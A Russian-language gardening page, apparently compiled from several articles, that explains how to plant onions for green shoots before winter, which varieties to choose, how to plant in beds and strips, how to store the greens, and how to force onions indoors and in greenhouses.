7 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Посадка лука на перо осенью

Правила высаживания лука на зелень в открытом грунте перед зимой

Желание получить ранний урожай приводит к вопросам, как сажать лук под зиму на зелень. Многие хозяйства занимаются высадкой в течение многих лет, а для процедуры были выведены специальные сорта. В данном материале подробно рассказано, как получить зеленый лук уже в начале весны.

Можно ли сажать лук под зиму на зелень

Для высадки необходимо изучить особенности озимого лука, его требования к уходу, поливу и укрытию на случай погоды без снега. Посадка лука на зелень осенью под зиму — привычная процедура для многих фермерских и частных хозяйств. Но для большинства огородников, данный способ выращивания культуры, остается абсолютной диковинкой.

Оптимальные сроки посадки

Чтобы вырастить желанный урожай, высадку проводят в определенное время. За этот период культура должна успеть пустить только корни, но не зеленую часть.

Опытные садоводы рекомендуют придерживаться следующих правил:

  • посадочный материал отправляют в почву после 15 октября;
  • процедуры проходят за один календарный месяц до предполагаемых заморозков;
  • температура воздуха в течение недели должна быть не меньше +5 градусов.

Важно! Посадочные работы не проводятся, если температура почвы ниже +3 градусов.

Какие виды лучше использовать

Садоводы советуют обратить внимание на следующие разновидности культуры:

Батун

Характеризуется большим количеством подвидов, может произрастать на одном и том же месте около 10 лет. Лучшие показатели урожайности отмечаются в первые три года. В описании указаны основные характеристики растения:

  • листва трубчатого вида, вырастает до 40 см, темно-зеленого оттенка с легким восковым налетом;
  • корни разрастаются до 60 см, на цилиндрической репке бурые чешуйки;
  • цветет в июне, цветоносы в длину 0,6-1 м, шаровидное соцветие состоит из небольших по размеру цветков с зелено-желтым окрасом;
  • у сочных перьев пряный запах и приятный вкус.

Урожаи собирают до 3 раз за один сезон, с каждого квадратного метра — до 4 кг. Черные мелкие семечки вызревают в июле.

Важно! Батун неплохо переносит холодную пору года, первые ростки формируются ранней весной.

Слизун

Известен своей повышенной устойчивостью к низким температурам, его можно растить в областях с суровой зимой.

  • темно-зеленая листва, широкая и плоская, до 30 см в длину;
  • при срезе выделяется слизистый секрет, на вкус слегка острый, присутствует небольшой привкус чеснока;
  • корневище культуры в толщину 3 см, в длину — до 5 см, нитевидные корешки проникают в землю на 60 см;
  • у растения ложная цилиндрическая луковица с белыми чешуйками, на одном корневище встречается до 3 штук;
  • цветение в июне-июле, цветоносы вырастают до 0,6 м, соцветие шаровидного типа составлено из розовых бутонов.

Семенной материал с неправильной формой и черным цветом вызревает к началу осени. С каждого квадратного места получают до 4 кг продукта, срезка зеленой части проводится до 4 раз за один сезон.

Важно! Во время бутонизации соцветия изначально поникшие, чуть позже они выпрямляются.

Шнитт

Отличается от сородичей раскидистым кустом, растение может выращиваться не только для получения перьев, но и как декоративное украшение. В характеристике указаны следующие сведения:

  • вырастает до 40 см, у трубчатой листвы ярко-зеленый тон;
  • перья нежные и сочные, с острым вкусом;
  • разветвленная корневая система мочковатого типа, под верхним слоем грунта формирует плотную дернину, в длину до 30 см;
  • у ложной луковицы мелкий размер, желтые чешуйки с внешней стороны, она формируется к концу летнего сезона;
  • цветение проходит все лето, цветоносы длинной в 40 см с шаровидными соцветиями, состоящими из колокольчиков цветков сиреневого, белоснежного, фиолетового окраса.

Черные семечки дозревают после 15 июля. При выращивании с каждого квадратного метра получают до 6 кг зелени. Срезка проводится при формировании молодых перьев.

Многоярусный лук

Название растения связано с формированием на цветоносе множества воздушных луковиц, расположенных по ярусам. В характеристиках культуры дана следующая информация:

  • листва полого типа, до 0,8 м в длину, темно-зеленого тона с небольшим восковым налетом;
  • перья с острым вкусом не грубеют продолжительное время;
  • корневая система мочковатого подвида с разветвлением, вырастает до 70 см;
  • ложная луковица до 5 см, снаружи покрыта чешуйками фиолетово-коричневого окраса, на втором году жизни она разделяется на 3 или 5 дочерних особей;
  • цветоносы сборные, из нескольких рядов, длина первого — 50 см, последующих — до 20 см, в течение сезона формируется до 5 ярусов;
  • зеленая листва (до 15 см) растет из воздушных луковиц.

С каждого квадратного метра собирают до 4 кг продукта, в первый год обрезку делают дважды, в последующие — до 3 раз.

Важно! У Египетского или многоярусного лука нет периода покоя, он обладает неплохой устойчивостью к сниженным температурам. Его можно сажать в теплицах — такой подход позволяет получать свежую зелень как осенью, так и зимой.

Как сажать правильно в открытый грунт

Лук на перо на зиму высаживается с учетом следующих требований:

  • участок должен постоянно проветриваться, но не находиться на сквозняке;
  • культура предпочитает солнечные места;
  • плодородная земля должна быть рыхлой, с нейтральной реакцией;
  • озимый лук не выращивают в зонах весеннего скопления воды — он начнет гнить.

Важно! Культуру нельзя посадить после сельдерея, картофеля или петрушки. Неплохим предшественником считают томаты, свеклу, капусту, горчицу и бобовые.

Подготовка посадочного материала

Как сажать лук на зелень на зиму — подготовительные процедуры включают ряд мероприятий:

  • производят отбор семенного материала: только твердые луковицы, без следов механического повреждения или заболеваний, с ровной поверхностью;
  • стандартный размер — от 2,5 до 4 см, из них получают максимальное количество зелени;
  • отобранные семена замачивают в растворе перманганата калия на полчаса — для предупреждения развития заболеваний;
  • луковицы после обработки подсушивают при комнатной температуре.

Для ускорения прорастания перед высадкой у севка срезают верхушки.

Важно! Весь семенной материал подбирают по размеру — если он одинаковый, то всходы будут равномерными.

Способ посадки

В пошаговой инструкции по мостовому методу даны следующие рекомендации:

  • на предварительно подготовленном участке формируют грядки с высотой до 15 см, шириной до 1 м, между соседними полосами оставляют промежуток в 0,5 м;
  • поверхность гряд тщательно выравнивают, почву рыхлят на 7 см в глубину;
  • посадочный материал высаживается вплотную: каждую луковку поворачивают донцем вниз и вдавливают на глубину до 5 см;
  • если песок сухой, то проводят легкий полив с небольшим объемом жидкости.

Еще один способ посадить зеленый лук на зиму — правила посева ленточным методом:

  • на поверхности предварительно подготовленной почвы делают бороздки до 5 см в глубину;
  • между ними должно сохранять расстояние в 20 см;
  • посадочный материал переворачивают верхушкой вверх, размещают в углублениях на расстоянии в 10 см друг от друга;
  • луковицы закрывают землей, при необходимости проводят полив.

Важно! В обоих случаях посадочные процедуры завершаются мульчированием: поверхность грядок укрывается палой листвой, еловыми или сосновыми ветками.

Внесение удобрение

Подкормку посадок проводят при предварительной подготовке участка:

  • после сбора урожая с поля убирают все растительные остатки — они могут послужить причиной развития грибковых заболеваний, в них могут скрываться паразитирующие насекомые;
  • почву удобряют компостом, перегноем или мочевиной, перекапывают участок (на глубину до 20 см) — процедура поможет обогатить землю необходимыми веществами;
  • перед проведением высадки культуры в субстрат вносят фосфорно-калийные составы, которые ускорят укоренение и позволят спокойно пережить зимние месяцы.

Важно! Перед посадочными процедурами землю вторично взрыхляют.

Укрытие грядок

В областях с умеренным климатом мульчирование проводят через 2 недели после высадки культуры: при ранней защите и сухой земле лук может прорасти, при мокрой погоде — вымокнуть и загнить. Толщина мульчи зависит от снега: чем его меньше, тем больше создается слой.

При укрытии пленкой ее укрепляют ветвями — чтобы полиэтилен не унесло первым порывом ветра. На опавшие листья или ельник ее не укладывают — материал воздухонепроницаемый, под ним образуется конденсат.

Важно! С приходом весенних дней и теплой погоды укрывной материал удаляют.

Как сохранить луковые перья на длительное время

Как сохранить зеленый лук: четкого времени обрезания свежей зелени нет из-за ее постоянного формирования. Сбор урожая проводится после отрастания перьев до 30 см — в это время они остаются плотными, свободно держат форму, не переламываются, их удобно транспортировать.

Подготовка зелени к хранению

Для продолжительного хранения лук тщательно промывают и перебирают, поврежденную листву откладывают. Чтобы содержать растение в свежем виде берут самые сочные перья. Листы со следами повреждений используются для просушки, охлаждения или засолки — их предварительно очищают от дефектных участков. Перед отправкой урожая в прохладное помещение, его подсушивают не меньше одного часа, равномерно разложив на полотенце.

Профессионалы обращают внимание на следующие тонкости:

  • свежие овощи не измельчают, домашнее хранение проходит в целом виде;
  • при использовании других методов зелень нарезают брусками по 5 см, слишком объемные дополнительно разрезают вдоль;
  • для сухого овоща — проводят нарезку на кусочки от 5 до 7 см;
  • в морозильной камере культуру хранят в полиэтиленовых пакетах или пластиковых контейнерах;
  • засолку проводят в стеклянную тару;
  • сушеные перья складируют в тканевые мешочки, свежие — в пластиковых пакетах.

Важно! Хранение может проходить как в холодильнике, так и морозильнике. Разрешается отправлять заготовки на застекленную лоджию с подходящим температурным режимом или в подвал.

Способы длительного хранения в домашних условиях

Домохозяйкам давно известны секреты длительного хранения.

  • Первый метод — стандартный

Требует свежесобранных перьев, которые размещают в полиэтиленовые пакеты. Содержат лук как в закрытом, так и открытом виде.

Увеличение времени достигается использованием специальных плотных пакетов, оснащенных мембранами для свободного газообмена. Лишний углекислый газ будет выходить через окошко, внутри сформируются благоприятные условия, позволяющие оставить овощ свежим.

Его используют хозяйки, которые хотят заморозить и сберечь зелень в течение продолжительного времени. Заготовленные перья сохраняют свои качества на протяжении одного календарного года.

Листву тщательно промывают, нарезают и раскладывают в пластиковые контейнеры или герметичные пакеты. Их отправляют в морозилку. Прежде чем замораживать, лук бланшируют 5 минут и охлаждают в дуршлаге. Такой подход позволит сберечь естественный цвет перьев при замораживании.

Для процедуры пользуются духовкой или электросушилкой. При любом выбранном варианте перья тщательно промывают, убирают лишнюю влагу полотенцем и нарезают на кусочки.

В духовом шкафу держат при 50 градусах на протяжении нескольких часов (дверца должна быть не закрыта). Во время процедуры постоянно контролируют состояние овоща — существует риск подгорания.

Автоматизированный процесс проходит согласно прилагаемой к аппарату инструкции. После завершения всех манипуляций готовый продукт раскладывают по герметичным емкостям и переносят в темное и неотапливаемое помещение.

Важно! Чтобы засолить перья, нужно взять 1 кг зелени и 200 г поваренной соли. После перемешивания продукт отправляют в стеклянную стерилизованную тару и закрывают крышками. Он годен 6 месяцев.

Какой из методов больше подходит — решать хозяйке.

Высадка осенью озимого лука позволяет получить ранние урожаи. Культура отличается выносливостью к вредителям и болезням, но требует правильного выбора срока посадки. Дальнейший уход не представляет сложности: после полива и мульчирования, грядки укрывают на зиму.

Посадка лука под зиму

Посадка озимого лука осенью становится все более популярной из-за ряда преимуществ.

Преимущества осенней посадки лука

  • Посаженный под зиму лук, практически не дает стрелок на следующий год;
  • Не требует особого ухода;
  • Урожай появляется раньше, чем у лука посаженного весной;
  • Растения отличаются большей выносливостью и устойчивостью к заболеваниям и луковой мухе, так как проходят закалку;

Осенняя посадка экономит время на другие культуры, высаживаемые весной. А также деньги, так как севок зимой сохранить невозможно, поэтому его можно дешево купить или же использовать свой, не потеряв при этом ни одной мелкой луковички.

Сорта озимого лука

От того, какой лук сажать осенью, будет зависеть, выживет ли он в морозы. Поэтому лучше для посадки под зиму подходят озимые районированные сорта.

Популярными считаются: Штутгартен Ризен, Эллан, Халцедон, Бессоновский, Даниловский-301, Одинцовец, Стригуновский, Мягковский-300, Арзамасский, Центурион.

Лучше выбрать несколько сортов и посмотреть, какие дадут лучший урожай. И на следующий год, высаживать только их.

Сроки посадки лука под зиму

Когда сажать лук под зиму – это важный вопрос, от которого будет зависеть дальнейшая судьба этого овоща.

Сроки посадки зависят от климата региона, погоды, сорта лука, посадки с помощью севка или семян, и цели его выращивания: на перо или репку.

Посадку лука с помощью севка можно разделить на три типа:

  1. Ранняя посадка осуществляется с августа по сентябрь. Проводится после сбора урожая. При этом землю следует полить. При ранней посадке, до зимы образуется несколько зеленых перышек, поэтому лук обязательно должен быть зимостойкий, чтобы они смогли перезимовать. Перед заморозками их нужно укрыть дышащим материалом или же листьями, соломой, ботвой и др.
  2. Средняя – с конца сентября по октябрь. Наиболее распространенный способ.
  3. Поздняя – начало ноября. Посадку проводят до замерзания грунта.

Посадку лука с помощью семян осуществляют в ноябре или декабре, уже в мерзлую землю, чтобы всходы взошли не раньше весны, иначе они замерзнут зимой.

Для того, чтобы выбрать, какой способ наиболее подходит, можно посадить несколько грядок в разные сроки и на следующий год уже посмотреть, какой способ более успешный.

Наибольшей же популярностью у огородников пользуется время с 5 по 20 октября.

Необходимые условия для посадки лука под зиму

Для того, чтобы получить хороший урожай, кроме приведенных выше сроков посадки, следует соблюдать другие не менее важные условия:

  • Дневная температура от 0 до -5 градусов, кроме ранней посадки;
  • Ночная – до минус 3 градусов;
  • Температура почвы +3-4 градуса для севка. Слишком рано лук высаживать нельзя, так как он быстро укорениться, и начнет расти, поэтому может не пережить зиму. В мерзлую почву севок также не рекомендуется высаживать. Это не относится к семенам, так как их высевают именно в мерзлую почву, чтобы они не успели взойти до весны, и всходы не замерзли;
  • Место выбирается солнечное и сухое, без застоев влаги, желательно на возвышенности;
  • Лучшими предшественниками считаются бобовые, капуста, морковь, картофель, огурцы, томаты;
  • Подбор севка: для осенней посадки лучше всего подходит 1 категория (1-1,5 см) и овсюжка (менее 1 см), они высаживаются на глубину до 3 см. 2 категория (2-3 см) и выборок (более 3 см) также можно высаживать осенью на глубину до 5 см, но для получения пера, репку они обычно не дают, уходя летом в стрелку. Из севка на следующий год получается ранний урожай качественных больших луковиц.;
  • Подбор семян: чернушку или семена лука можно собрать самостоятельно или купить в магазине. При этом семена должны быть здоровые и примерно одного размера, что обеспечить дружность всходов.

Семена обычно высаживаются для получения севка или зеленого пера, кроме скороспелых сортов, которые на следующий год дают хорошие луковицы даже из семян, например, семейный лук.

Посадка севка под зиму

  • Прогреть севок при температуре 40 градусов в течение 8 часов;

  • Грядку перед посадкой хорошо вскопать, удалить все сорняки и пролить медным купоросом (1 столовая ложка на 10 л воды);

  • Удобрить компостом или перегноем с золой по пол ведра, и добавить треть ведра песка для облегчения почвы;

  • Разровнять землю;
  • Сделать бороздки глубиной 5 см на расстоянии 15-20 см друг от друга;
  • Высадить севок на расстоянии 8-15 см друг от друга в зависимости от желаемых размеров луковиц, чтобы избежать загущения. Если лук высаживается на перо, то можно сделать более густые посадки;

  • Присыпать сверху землей (3-4 см) и уплотнить;
  • При наступлении морозов, грядку покрыть опилками, торфом, соломой, сухой ботвой, лапником и др.;

  • При выпадении снега, накидать его на грядку для сохранения тепла;
  • Весной лишний снег и мульчу убрать, так как они увеличивают влажность почвы и не дают ей прогреваться, что замедлит рост лука.

Посадка семян под зиму

Подготовка почвы и укрытие происходит так же, как при посадке севка. Сам же процесс высевания семян заключается в следующем:

  • В почве делаются бороздки глубиной до 2,5 см на расстоянии 18-20 см. Или углубления в шахматном порядке;

  • Семена лучше посадить густо, если нет уверенности, что они все прорастут, а весной прорядить;

  • Присыпать землей слоем в 1,5 см;
  • Так же, как и посаженный севок, укрыть мульчей и снегом.
  • После появления всходов удобрить грядку с помощью мочевины или суперфосфата (до 40 г/м 2 );
  • При формировании луковиц внести хлористый калий (10 г/м 2 );
  • В жаркую сухую погоду поливать лук два раза в неделю. Если выращивается лук-батун на перо, то поливы должны быть, наоборот, обильными;
  • Периодически пропалывать сорняки;
  • Рыхлить почву при образовании корки на поверхности земли для обеспечения вентиляции луковиц;
  • При пожелтении пера полив прекратить и через 7-10 дней можно выкапывать лук.

Если лук во время не выкапать, то его рост возобновится, а луковицы нельзя будет долго хранить.

Выкапывать следует аккуратно, стараясь не повредить луковицы.

При несоблюдении условий ухода и посадки может произойти следующие:

  • Из-за слишком глубокой посадки, всходам может не хватить сил прорасти, а из-за поверхностной посадки – севок или семена могут замерзнуть;
  • Замерзание при отсутствии или недостаточном мульчировании.
  • Гниение луковиц из-за чрезмерного переувлажнения;

Таким образом, правильно выбрав сорт, сроки и способ посадки, можно получить ранний урожай лука без лишних хлопот.

Лук на перо, на зиму посадка, выращивание зеленого лука

Лук является овощем, который может использоваться как основной и дополнительный компонент при приготовлении различных блюд. Он очень популярен, это объясняется его отличными вкусовыми качествами, а также полезными свойствами. Богатый химический состав присущ не только репчатому луку, но и зеленым перьям. В свежем виде зеленый лук помогает заменить свежую зелень в начале весны, зарядить организм витаминами. Как выращивать лук на перо на зиму, посадка какого сорта лука принесет наибольший урожай?

Как выбрать сорт лука для посадки

Существует много сортов лука, но как определиться, какой сорт является самым лучшим для посадки на перо. На самом деле вырастить зеленый лук можно из любого вида этой культуры. Выбирая луковицу, можно определить количество зачатков. Для этого достаточно разрезать луковицу пополам. Какой сорт лука лучше? Представляем несколько сортов лука, из которых каждый сможет выбрать понравившийся:

  • Лук-порей. Этот вид лука иногда еще называют жемчужным. Чаще всего использовать в пищу нижнюю часть растения, но стоит попробовать и верхнюю. Листья порея обладают деликатным вкусом. По внешнему виду они напоминают чесночные, но немного шире. При самом минимальном уходе можно собрать 20 килограмм лука с грядки с 9 квадратных метров.
  • Лук-батун. Есть многолетние и однолетние сорта этого лука. Иногда его называют дудчатым, татарским или песчаным. Этот вид отличается высокой урожайностью, обладает красивой ровной зеленью. Зелень можно срезать несколько раз за период вегетации.
  • Лук-слизун. Внешний вид лука имеет схожие черты с чесночными листьями. Слабый чесночный аромат добавляет схожести. Структура листа — широкая и плоская. Есть и отличия. У слизуна очень нежная структура. К достоинствам вида можно отнести высокую урожайность и скороспелость. Лук устойчив к морозам. При выращивании в открытые грядки лук радует зелеными перьями до самых заморозков. В закрытом грунте круглый год дает урожай.
  • Лук-шалот. Самый известный вид лука. Он широко используется при приготовлении блюд. Перья хорошо хранятся, оставаясь сочными. Лук легко выращивать, он не требует особых навыков при уходе. Отличается высокой урожайностью.
  • Лук многоярусный. Канадский, или египетский лук, считается самым неприхотливым. Он устойчив к низким температурам. По качеству получаемой зелени и урожайности с этим видом не могут конкурировать другие сорта. Многоярусный лук легко остается зимовать в земле, а на следующий сезон вновь идет в рост.
  • Шнитт-лук. Еще одно название — резанец. Длинные и тонкие листья этого лука — его главное преимущество. Лук имеет отличный аромат. Может храниться в течение длительного времени, вкусовые качества и структура отлично сохраняются. Хорошая урожайность.

Огородники могут обратить внимание и на другие популярные сорта. Из самых популярных: Ростовский, лук Черный Принц, Янтарный и другие.

Выращивание лука на перо: создаем условия

Практически все виды лука, которые мы перечислили, обладают морозоустойчивостью. Помимо этого, лук неприхотлив. Чтобы вырастить головку репчатого лука отличного качества, нужно вносить в почву различные удобрения, пропалывать, вовремя поливать и защищать от вредителей. При выращивании лука на перо не требуется прилагать столько усилий. Но соблюдать некоторые условия все же нужно.

Первый нюанс — солнечный свет, а при выращивании в тепличных условиях, искусственное освещение. Свет необходим, чтобы листья лука стали яркого зеленого цвета и приобрели свои ценные вкусовые качества. Если освещение слабое, листья будут очень длинными, что не очень хорошо.

Выбирая место для посадки лука под перо, нужно знать, что почва должна хорошо удерживать влагу. Но обилие влаги тоже может навредить посадкам. Нельзя сажать лук там, где уровень грунтовых вод поднимается слишком высоко.

Для посадки в открытый грунт тип почвы не имеет значения. А при посадке лука на перо в теплице лучше использовать органические удобрения, способные улучшить состояние почвы в ящиках. Для этого подойдет торф, перегной или компост. Они добавляются при посадке, потом луковицы засыпаются почвой.

Лук на перо можно сажать семенами и луком-севком. Оба метода эффективные, различаются методы только тем, что посадку нужно осуществлять в разное время. При высадке семенами ждать урожая придется немного дольше.

Готовим посадочный материал

Лук-севок нужно подготовить перед посадкой. Его сортируют, перебирают, удаляют поврежденные, зараженные. Затем кладут в воду и вымачивают несколько часов, чтобы луковицы напитались влагой. Это позволяет луковице не засохнуть в почве, хорошо адаптироваться к росту, дать хорошие всходы. Для посадки лучшими считаются луковицы диаметром не менее 2,5 см. Слишком крупные луковицы от 4 см не рекомендуется высаживать. Верхушку при посадке нужно срезать, чтобы ускорить выгонку зелени.

Подготовленный посадочный материал на 50-75% лучше всходит, увеличивается количество зелени. При выращивании зеленого пера из семян время увеличивается, но способ этот наиболее бюджетный. Сэкономить помогут и многолетние сорта лука. Те семена, которые приобретают в специализированных магазинах, в дополнительной подготовке к посадке не нуждаются, поскольку они уже предварительно обработаны. Если семена куплены с рук или собраны самостоятельно, желательно замочить лук в теплой воде, как и севок, чтобы стимулировать к росту.

Делаем грядки, готовим почву для посадки

Для посева семян почву особенным образом готовить не нужно. Чтобы посадить лук на перо севком, нужно тщательно вскопать почву. Необходима именно глубокая перекопка, чтобы внести в почву органические вещества, стимулирующие рост лука. Этот вид лука не нуждается в минеральных удобрениях. Их можно использовать только при очень плохой, тяжелой почве.

В день посадки почву разравнивают, немного уплотняют, чтобы она потом не просела естественным образом с луковицами и не подняла их. Грядки не делают широкими, опытные огородники считают, что на более узких грядках можно вырастить более высокий урожай.

Сроки посадки лука на перо

Когда сажать лук, чтобы можно было получить богатый урожай? Время посадки никак не зависит от сорта или вида лука. При высадке в открытый грунт посадкой лука занимаются поздней осенью, незадолго до наступления заморозков. Это необходимо, чтобы луковица не успела дать всходы, иначе после заморозков она погибнет. В промерзшую почву сажать севок уже поздно, луковицы замерзнут и не прорастут. Если осенью с посадкой припозднились, лучше дождаться весны, высадив с помощью севка в открытый грунт или в теплицу.

Выращивание лука на перо в теплице зимой возможно с октября до апреля, когда зелень начинает появляться на открытых грядках. С февраля севок высаживается в парники, чтобы получать зеленые перышки до самого мая. Посадка лука на перо семенами проводится в середине июля.

Способы посадки лука на перо

Как рационально использовать площадь грядки? Лук-севок можно высаживать двумя способами.

Мостовой способ

Для этого мостового способа посадки лука необходимо большое количество посадочного материала, луковицы при этом способе плотно выкладывают друг к другу, слегка заглубляя в почву. Посаженные луковицы засыпают 2 см слоем почвы. Более толстый слой делать не рекомендуется, это задержит рост растения. На квадратный метр почвы уходит около 13 килограммов луковиц.

Ленточный способ

При этом способе луковицы высаживаются в подготовленные борозды. Между рядами необходимо сделать расстояние от 10 до 20 сантиметров, между луковичками — 1-4 сантиметра. Луковички засыпаются почвой, грядки разравниваются.

Способ посадки семян

Для посадки семян делают борозды на расстоянии не менее 35 сантиметров и высаживают в них семена. Семена засыпают очень густым слоем. После того, как появляются настоящие листочки лука, грядку прореживают. Растения оставляются на расстоянии 3,5 -5 см.

Уход за луком

Как получить высокий урожай? Луку нужен тщательный уход и постоянный присмотр. Важно учитывать важные аспекты агротехники, не только высаживая растения по определенной схеме посадки лука на перо, но и осуществляя прополку, рыхление, полив почвы, подкормку растений.

Рыхление почвы. Во время рыхления кислородом насыщаются корни растения. Проводить рыхление нужно часто, чтобы плотная корка на поверхности не успела образоваться. Делать это лучше через два дня после полива.

Полив. Сколько поливать? Как часто? Влага — основной питательный компонент, необходимый луку. Она несет корням другие полезные элементы. Лучше поливать лук дважды в неделю. Конечно, это рекомендованное количество поливов, необходимо ориентироваться на погоду, количество осадков, а также от типа почвы, насколько долго она остается влажной. При жаркой погоде поливают лук и три раза в неделю, и каждый день при сильной засухе. Чем старше лук, тем меньше требуется ему влаги.

Удобрения. С помощью специальных растворов проводится подкормка растения в виде поливов. Самыми популярными удобрениями являются раствор мочевины или нитроаммофоски. Подкормка проводится в период, когда уже начали срезать зелень. Удобрения в это время нужны для того, чтобы отращивать заново поврежденные перья. Если не использовать подкормку, первые перья тускнеют, становятся тоньше, их аромат и вкус меняются.

Удаление сорняков. Удалять сорняки очень важно. При большом количестве сорняки лишат лук всех питательных элементов, которые он получает из почвы. Не стоит использовать междурядья для выращивания других культур, как иногда это делают при выращивании репчатого лука.

Уход в зимнее время

Грядки, которые остаются зимовать с посаженным луком, нужно укрывать мульчей. Это может быть слой субстрата, перегноя, который весной сразу удаляется, чтобы дать растению развиваться. Можно установить пленочный каркас, он будет служить парником.

Если были посажены семена, к наступлению зимы обычно луковые перья уже выросли. Их можно сохранить, если закрыть грядки торфом и соломой. Как только мульча будет удалена, придет тепло, свежая зелень пойдет в активный рост.

Выращивание зеленого лука дома

Выращивать лук на зелень в домашних условиях не так уж и сложно. Существует несколько способов: метод гидропоники и традиционный способ.

Гидропоника — это известный всем с детства метод выращивания лука в стакане. Луковицу ставят в стаканчик с водой, через несколько дней она даст корни, а затем и зеленые перья вкусного лука.

Традиционный способ — выращивание лука в ящике с землей. Чтобы получить большое количество зеленого лука, зимой на подоконнике сэкономить место, можно использовать оригинальный метод высадки лука-севка в пластиковую бутыль. Для этого в 6-литровой бутылке из-под питьевой воды делают круглые отверстия. Насыпают туда землю, по мере засыпания в емкость, высаживают луковицы. Получится небольшая и очень компактная грядка, которую можно поставить у окна, регулярно поливать и собирать урожай зеленого лука. Соблюдая все правила, можно круглогодично радовать себя хорошим урожаем зеленого витаминного лука.

Лук на перо: выгонка и выращивание лука на зелень в теплице и в домашних условиях

Автор: Наталья 20 февраля 2019 Категория: Огородные растения

Зеленый лук способен придать любому блюду аппетитный вид и питательную ценность, особенно зимой и ранней весной, когда потребность человека в витаминах чрезвычайно высока. Тем более, что в пере лука витамина C, который просто необходим нашему организму в этот период, больше, чем репчатой луковице. И чтобы не страдать от недостатка витаминов и получать к столу зеленый лук в любое время года, мы предлагаем вам научиться выращивать лук на зелень в домашних условиях и в теплице.

Содержание

Прослушать статью

Зеленый лук – описание

Для получения зеленого лука на еду можно использовать контейнер и держать его на подоконнике, но если вам нужен зеленый лук в больших количествах, то лучше растить его в теплице. Выращивать лук на перо очень просто, поскольку это одна из самых изученных огородных культур, возделываемая человечеством уже более пяти тысяч лет.

Лук на зелень в домашних условиях выращивают как в почве, так и на гидропонике (то есть в воде), и мы с удовольствием расскажем вам, как это делается.

Выгонка лука на перо (зелень)

Выращивание лука на перо

Выращивание лука на зелень начинают с подготовки посадочного материала. Рассортируйте луковички, отбракуйте негодные, больные и деформированные. Хорошая луковица должна быть плотной, без признаков гнили и с блестящими чешуйками. Срежьте верхушки – одну четвертую часть луковиц. Эта мера ускорит доступ кислорода к почкам, и они быстрее дадут зелень. Если луковички уже чуть проросли, обрезку делать не следует. Ускорить прорастание лука поможет замачивание посадочного материала на 12 часов в воде температурой 35-38 ºC.

Если вы решили выращивать лук на зелень в почве, то она должна быть рыхлой, а для получения оптимального субстрата добавьте в перегной вермикулит и выложите эту смесь в контейнер слоем в 7-10 см, но предварительно пролейте почвосмесь горячим темно-розовым раствором перманганата калия, а потом холодной проточной водой.

Как посадить лук на зелень

Посадка лука на выгонку пера в контейнер осуществляется мостовым способом – луковицы высаживают практически вплотную – на расстоянии 1-2 см. Их просто ставят на субстрат донцем, слегка вдавливают в него, но не заглубляют их и не закапывают, иначе они начнут гнить. После посадки субстрат поливают теплой водой.

Если вы хотите выращивать лук на зелень в воде, плотно уложите луковицы в поддон и залейте водой на четверть. Через две недели у луковиц отрастут листья, которые можно будет использовать в пищу. По мере того, как уровень воды в поддоне будет снижаться, следует его восстанавливать.

Когда сажать лук на перо

В среднем скорость выгонки пера составляет от двух до трех недель. В домашних условиях и в теплице лук на выгонку высаживают с октября по апрель, а в открытом грунте его выращивают с весны до осени. Собственно, лук при соблюдении определенных условий можно выращивать круглый год.

Выращивание лука на перо в домашних условиях

Как выращивать лук на зелень в домашних условиях

После посадки контейнер с луком помещают на неделю в теплое место с температурой 25-30 ºC, а когда листья достигнут в длину 1-2 см, можно перенести контейнер на балкон или на неотапливаемую веранду. В дальнейшем скорость отрастания зелени зависит от температуры воздуха и воды для полива.

Уход за луком в домашних условиях

Оптимальная температура воздуха для выращивания перьев лука 18-22 ºC, а воды – 20-25 ºC. Поливают лук 1 или 2 раза в неделю. Перо лука не нуждается в подкормках, поскольку получает питание из луковицы. Как только перо вытянется до 25-35 см, его можно начинать срезать по краям – нарастание листьев происходит из центра луковицы. Если вы хотите получать лук постоянно и без перерыва, высаживайте его с интервалами в 2-3 недели.

Выращивание лука на перо в теплице

Как вырастить лук на зелень в теплице

Лук на зелень в теплице выращивают с октября по апрель из однолетнего или двулетнего лука-выборка, прошедшего предварительную обработку, о которой мы писали выше. Высаживают его мостовым способом в ящики, заполненные торфом, перегноем или компостом, сверху едва присыпают торфом, который опудривают известью-пушонкой во избежание появления на поверхности плесени. После посадки ящики составляют друг на друга где-нибудь в углу, чтобы они не занимали много места.

Уход за луком в теплице

Температура содержания на этом этапе должна быть 18-20 ºC в дневное время и 12-15 ºC ночью. Лук поливают по мере необходимости, а помещение проветривают. За 10-12 дней у луковиц образуется корневая система, а перо отрастает до 5-8 см, только не зеленое, а белое. На этой стадии ящики расставляют по стеллажам и содержат при температуре 20-22 ºC, регулярно увлажняя в них субстрат. Для нормального роста и развития лука необходимо соблюдать 12-часовый световой день, причем лампы для досвечивания должны располагаться вертикально, чтобы не происходило заламывания пера. Белые перья лука постепенно зеленеют.

Через пару дней после расстановки ящиков с луком по стеллажам, в субстрат вносят калийное (10-15 г хлористого калия на м²) и азотное (20-40 г аммиачной селитры на м²) удобрения: их в сухом виде распределяют по ящикам и потом при поливе смывают водой в грунт. Когда перо лука достигает в высоту 35 см, его срезают.

Выращивание лука на зелень в открытом грунте

Посадка лука на зелень под зиму

Для выращивания лука на перо в открытом грунте используют луковички диаметром от 2,5 до 4 см. Лук на зелень осенью сажают за две недели до морозов, перед посадкой обработав выборки теплой водой и обрезав у них вершинки. Посадка осуществляется уже описанным нами мостовым способом, когда луковицы укладываются рядышком корнями вниз, а потом их сверху засыпают слоем грунта толщиной 2-3 см, или ленточным способом, при котором луковицы сажают в бороздки на расстоянии от 1 до 4 см друг от друга и заделывают в грунт, а интервал между бороздами составляет от 10 до 20 см.

Уход за посадками лука осенью

Чтобы луковицы не вымерзли зимой, лук под зиму на зелень укрывают дополнительно слоем перегноя или навоза толщиной 3,5–5 см. Весной утепляющий слой убирают и устанавливают над грядкой пленочный каркас. До наступления заморозков почву на грядке нужно поддерживать в слегка влажном состоянии, чтобы у луковиц начали отрастать корни.

Лук на перо можно вырастить и из семян, и хотя это потребует больше времени, достанется вам такой лук дешевле, поскольку семена многолетних видов лука стоят не так дорого, как выборок. Семена лука на перо (зелень), сеют в хорошо обработанный и заранее удобренный грунт летом, в середине июля, рядами, расположенными на расстоянии 30-40 см, а когда всходы дадут первый лист, их прореживают до расстояния 3,5-5 см между сеянцами. Перед наступлением зимы грядку укрывают соломой или торфом. А как только сойдет снег, вы получите свежую зелень.

Сорта лука на перо (зелень)

Какие виды лука выращивают на перо

Какой лук выращивают на зелень? Популярны такие виды лука:

